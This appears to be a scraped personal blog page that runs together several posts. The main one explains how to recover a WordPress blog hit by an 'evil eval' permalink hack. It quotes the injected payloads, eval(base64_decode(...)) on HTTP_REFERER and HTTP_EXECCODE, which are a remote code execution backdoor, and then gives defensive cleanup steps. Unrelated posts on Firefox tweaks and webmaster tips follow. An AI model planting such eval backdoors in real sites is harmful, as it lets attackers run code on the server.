blah/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or this:

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Or your feed crapped like this:

error on line 22 at column 71: xmlParseEntityRef: no name wordpress

Do not panic – you’re hacked. And there is three steps to get rid of it.

1) Restore your permalinks
Go to Admin panel -> Settings -> Permalinks.
Set your permalink structure to whatever it was earlier. If you don’t even imagine what it was – you can always ask google for it – just like this: site:yourblogurl.com – and you’ll see the answer in the links to your site.

2) Kill the intruder(s)
Go to your preferred mysql administration tool (say, MySqlAdmin) and run this code in the SQL window:

SELECT * FROM `wp_usermeta`
WHERE `meta_value` LIKE '%script%'

You’ll see the list of records, write down user_ids of those guys.
Go to Admin panel -> Users -> Authors & Users, copy the edit link for any user, it’ll be somethings like:

http://yourblogurl.com/wp-admin/user-edit.php?user_id=14&wp_http_referer=%2Fwp-admin%2Fusers.php

Then paste it into address line, and change user_id=XX to the first user_id you wrote. Go.
Replace First name with whatever you want (for example “z”), insert “motherfncker@test.com” into Email field (or whatever, but remember it, you’ll need it later) and set the Role into Subscriber. Push Update user. Then repeat with the next one in your user_ids list. After you finished – just type in into the search line word “motherfncker” (or whatever you set emails to). Now – just delete bastards!

3) Defend the base
Just upgrade your wordpress. If you will do it periodically – there will be no such problems at all!

If you do not have ability to use some SQL tool – you can try to blind find bastards:
Go to Admin panel -> Users -> Authors & Users
Note the number of Admin users (right under “Users” header). One of them is you, all others – bastard ones
Try to find max. user_id in the list by hovering your mouse over links. Then copy the edit link of the user with topmost ID, insert it into address line, change it to next number and go. Did not work? Try the next number. Or previous one. You can even loop through all IDs not in use. And when you’ll find him – you know what to do!

Related posts

• WordPress Dashboard problem fix (0)
• WordPress 2.2.1 (0)
• WordPress 2 updated (0)
• War Against SPam – WASP! (0)
• War Against SPam – step two! (0)

Related posts

• Winnie The Who The Bloody Hell Is That? (0)
• What to do if your blog was hacked by evil eval (0)
• What happened to the daily show (0)
• Microsoft Windows Nazi Flag (1)
• Hello, cruel world! (0)

I don’t think so. I’ll tell you more – many people feeling fucky nowdays. Today they’re webmasters, but times when guy behind a browser will feel himself fucky – it’s a not-so-far-away future.

Related posts

• No related posts.

Do you know FireFox well?

And how about advanced settings page? And how about direct access to it? OK, just type “about:config” into the address bar and hit return. Just like this:

Now, what do you see?

It’s your advanced settings, basically you can’t reach most of them in other way…

How To Speed Up Your FireFox

Look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

They looked just like this:

Now,
Set network.http.pipelining to true
Set network.http.proxy.pipelining to true
Set network.http.pipelining.maxrequests to 10 (or 15)
Right-click, select New->Integer, name it nglayout.initialpaint.delay, set value to 0
Restart Firefox.

What we’ve done?

We allowed to make up to 10 (15) connections at once. Make sure not to set it higher than 20.
Also we allowed to act with received information with zero waiting time.

Related posts

• What to do if your blog was hacked by evil eval (0)
• Disable Autorun Once And For All (0)
• Mozilla is alive! Mammon is… Who? (0)
• Mozilla is alive! Mammon is… Who? (0)
• Hidden FireFox’s resources (0)

I can tolerate some virus-generated URLs but when I see this “/feed%3Ahttp%3A//eyedmax.com/feed/“or search bot asking me for robots.txt or favicon.ico (and I haven’t one) – I can blow up.

My advices to all webmasters are following:

• put all common files (including index.html, robots.txt and favicon.ico) to your site
• validate the code for “strange” URLs
• analyze log files
• use the automatically generated site map

Don’t trouble Google ’till Google troubles you!

Related posts

• Star Wars image experiment (0)
• Hello, cruel world! (0)
• BlogJet (0)
• BlogDesk software (1)
• Blog adress changed – now it’s eyedmax.com (0)